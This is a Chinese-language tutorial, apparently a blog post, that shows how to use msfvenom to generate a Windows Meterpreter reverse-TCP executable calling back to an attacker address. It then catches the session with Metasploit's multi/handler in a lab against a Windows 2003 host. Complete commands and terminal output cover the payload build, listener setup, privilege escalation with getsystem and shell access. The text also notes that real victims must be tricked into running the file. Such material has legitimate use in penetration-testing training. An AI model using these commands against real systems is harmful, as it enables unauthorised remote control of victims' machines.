kali的payload的使用攻击之反弹型payload的使用
一、msfvenom 命令简介
msfvenom是payload产生器,也是shellcode代码生成器
Payload,中文“有效载荷”,指成功exploit之后,真正在目标系统执行的代码或指令。
Shellcode,简单翻译“shell代码”,是Payload的一种,由于其建立正向/反向shell而得名
整个字节流一般包含两个部分:
(1)一个包含部分代码的字节序列,被送入目标计算机执行,辅助攻击机获得控制权,比如打开目标计算机上的端口或者建立一个通信信道。
(2)一个用于实现在目标主机上运行某个应用程序如cmd或者计算器(常用于poc–概念验证)等。
一个攻击代码发送的字节序列往往同时包含payload和shellcode代码。
二、msfvenom 命令的使用
1、生成可执行文件类型的payload
root@kali222:~# msfvenom ---查看选项参数
Options:
-l, --list List all modules for [type]. Types are: payloads, encoders, nops, platforms, archs, encrypt, formats, all
-p, --payload Payload to use (--list payloads to list, --list-options for arguments). Specify '-' or STDIN for custom
--list-options List --payload 's standard, advanced and evasion options
-f, --format Output format (use --list formats to list)
-e, --encoder The encoder to use (use --list encoders to list)
--smallest Generate the smallest possible payload using all available encoders
--encrypt The type of encryption or encoding to apply to the shellcode (use --list encrypt to list)
--encrypt-key A key to be used for --encrypt
--encrypt-iv An initialization vector for --encrypt
-a, --arch The architecture to use for --payload and --encoders (use --list archs to list)
--platform The platform for --payload (use --list platforms to list)
-o, --out Save the payload to a file
......此处省略
root@kali222:~# msfvenom -l payloads --查看所有的payload
Framework Payloads (546 total) [--payload ]
Name Description
---- -----------
aix/ppc/shell_bind_tcp Listen for a connection and spawn a command shell
aix/ppc/shell_find_port Spawn a shell on an established connection
aix/ppc/shell_interact Simply execve /bin/sh
......此处省略
实例
win2003(192.168.1.64)作为靶机
kali(192.168.1.149)作为攻击机。
反弹型payload的使用
kali上侦听payload的运行,通过win2003上的payload的运行,反弹到kali.
1.在kali根目录生成test.exe文件
root@kali222:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.149 lport=12345 -f exe -o /root/test.exe
2.将该test.exe文件复制到win2003中并运行(实际环境里面需要通过社工的方法让win2003运行)
3.启动msfconsole,设置监听
root@kali222:~# service postgresql restart
root@kali222:~# msfdb init
root@kali222:~# msfconsole
4.打开PAYLOAD利用模块
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp --设置反弹PAYLOAD,和 msfvenom 中的命令保持一致
msf5 exploit(multi/handler) > set LHOST 192.168.1.149 --设置kali的ip
msf5 exploit(multi/handler) > set LPORT 12345 --设置kali的port ,需要与生成payload命令中的端口号一致
msf5 exploit(multi/handler) > show options
5.等待远程的payload先运行再执行exploit
msf5 exploit(multi/handler) > exploit -----在执行这步之前,win2003上的test.exe需要确保运行了
meterpreter > sysinfo —查看目标主机信息
6.提升权限
meterpreter > use priv —提升特权
meterpreter > getsystem —取得系统级权限
7.进行shell
meterpreter > shell
发现成功控制win2003主机
全部过程
root@kali222:~# msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.149 lport=12345 -f exe -o /root/test.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of exe file: 73802 bytes
Saved as: /root/test.exe
root@kali222:~# service postgresql restart
root@kali222:~# msfdb init
[i] Database already started
[i] The database appears to be already configured, skipping initialization
root@kali222:~# msfconsole
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO. .oOOOOoOOOOl. ,OOOOOOOOo
dOOOOOOOO. .cOOOOOc. ,OOOOOOOOx
lOOOOOOOO. ;d; ,OOOOOOOOl
.OOOOOOOO. .; ; ,OOOOOOOO.
cOOOOOOO. .OOc. 'oOO. ,OOOOOOOc
oOOOOOO. .OOOO. :OOOO. ,OOOOOOo
lOOOOO. .OOOO. :OOOO. ,OOOOOl
;OOOO' .OOOO. :OOOO. ;OOOO;
.dOOo .OOOOocccxOOOO. xOOd.
,kOl .OOOOOOOOOOOOO. .dOk,
:kk;.OOOOOOOOOOOOO.cOk:
;kOOOOOOOOOOOOOOOk:
,xOOOOOOOOOOOx,
.lOOOOOOOl.
,dOd,
.
=[ metasploit v5.0.6-dev ]
+ -- --=[ 1856 exploits - 1055 auxiliary - 327 post ]
+ -- --=[ 546 payloads - 44 encoders - 10 nops ]
+ -- --=[ 2 evasion ]
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.1.149
LHOST => 192.168.1.149
msf5 exploit(multi/handler) > set LPORT 12345
LPORT => 12345
msf5 exploit(multi/handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.1.149 yes The listen address (an interface may be specified)
LPORT 12345 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.1.149:12345
[*] Sending stage (179779 bytes) to 192.168.1.64
[*] Meterpreter session 1 opened (192.168.1.149:12345 -> 192.168.1.64:1029) at 2020-04-15 13:45:23 +0800
meterpreter > sysinfo
Computer : OP
OS : Windows .NET Server (Build 3790).
Architecture : x86
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > use priv
[-] The 'priv' extension has already been loaded.
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > shell
[-] Failed to spawn shell with thread impersonation. Retrying without it.
Process 904 created.
Channel 2 created.
Microsoft Windows [�汾 5.2.3790]
(C) ��Ȩ���� 1985-2003 Microsoft Corp.
C:\Documents and Settings\Administrator\����>whoani
whoani
'whoani' �����ڲ����ⲿ���Ҳ���ǿ����еij���
���������ļ���
C:\Documents and Settings\Administrator\����>